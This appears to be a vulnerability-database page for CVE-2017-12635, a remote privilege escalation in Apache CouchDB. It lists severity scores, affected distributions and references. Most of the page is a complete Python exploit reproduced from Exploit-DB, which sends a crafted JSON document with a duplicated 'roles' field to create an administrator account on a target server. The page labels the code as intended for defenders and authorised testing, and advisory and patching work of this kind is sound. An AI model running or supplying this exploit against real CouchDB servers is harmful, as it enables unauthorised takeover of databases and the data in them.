CVE-2017-12635
critical
CVSS v3
9.8
CVSS v4 NEW
โ
VIR risk
10.0
Description
multiple issues in couchdb
Predictions
Exploit likelihood
97%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation
#!/usr/bin/env python
'''
@author: r4wd3r
@license: MIT License
@contact: r4wd3r@gmail.com
'''
import argparse
import re
import sys
import requests
parser = argparse.ArgumentParser(
description='Exploits the Apache CouchDB JSON Remote Privilege Escalation Vulnerability' +
' (CVE-2017-12635)')
parser.add_argument('host', help='Host to attack.', type=str)
parser.add_argument('-p', '--port', help='Port of CouchDB Service', type=str, default='5984')
parser.add_argument('-u', '--user', help='Username to create as admin.',
type=str, default='couchara')
parser.add_argument('-P', '--password', help='Password of the created user.',
type=str, default='couchapass')
args = parser.parse_args()
host = args.host
port = args.port
user = args.user
password = args.password
pat_ip = re.compile("^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$")
if not pat_ip.match(host):
print "[x] Wrong host. Must be a valid IP address."
sys.exit(1)
print "[+] User to create: " + user
print "[+] Password: " + password
print "[+] Attacking host " + host + " on port " + port
url = 'http://' + host + ':' + port
try:
rtest = requests.get(url, timeout=10)
except requests.exceptions.Timeout:
print "[x] Server is taking too long to answer. Exiting."
sys.exit(1)
except requests.ConnectionError:
print "[x] Unable to connect to the remote host."
sys.exit(1)
# Payload for creating user
cu_url_payload = url + "/_users/org.couchdb.user:" + user
cu_data_payload = '{"type": "user", "name": "'+user+'", "roles": ["_admin"], "roles": [], "password": "'+password+'"}'
try:
rcu = requests.put(cu_url_payload, data=cu_data_payload)
except requests.exceptions.HTTPError:
print "[x] ERROR: Unable to create the user on remote host."
sys.exit(1)
if rcu.status_code == 201:
print "[+] User " + user + " with password " + password + " successfully created."
sys.exit(0)
else:
print "[x] ERROR " + str(rcu.status_code) + ": Unable to create the user on remote host."Apache CouchDB - Arbitrary Command Execution (Metasploit)
Source code queued for fetch โ refresh in a moment.
Metasploit modules
Source fetch failed: fetch_error โ view the original via the link above.
Source fetch failed: fetch_error โ view the original via the link above.
OS impact
SUSE Affected 1 release
| Version | Status | Fixed in |
|---|---|---|
| โ | Affected | โ |
Arch Fixed 1 release
| Version | Status | Fixed in |
|---|---|---|
| โ | Fixed | 2.1.1-1 |
References
- https://security.archlinux.org/ASA-201711-24
- http://www.securityfocus.com/bid/101868
- https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67%40%3Cdev.couchdb.apache.org%3E
- https://lists.debian.org/debian-lts-announce/2018/01/msg00026.html
- https://security.gentoo.org/glsa/201711-16
- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03935en_us
- https://www.exploit-db.com/exploits/44498/
- https://www.exploit-db.com/exploits/45019/
- https://www.suse.com/security/cve/CVE-2017-12635.html
CWEs
CWE-269
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.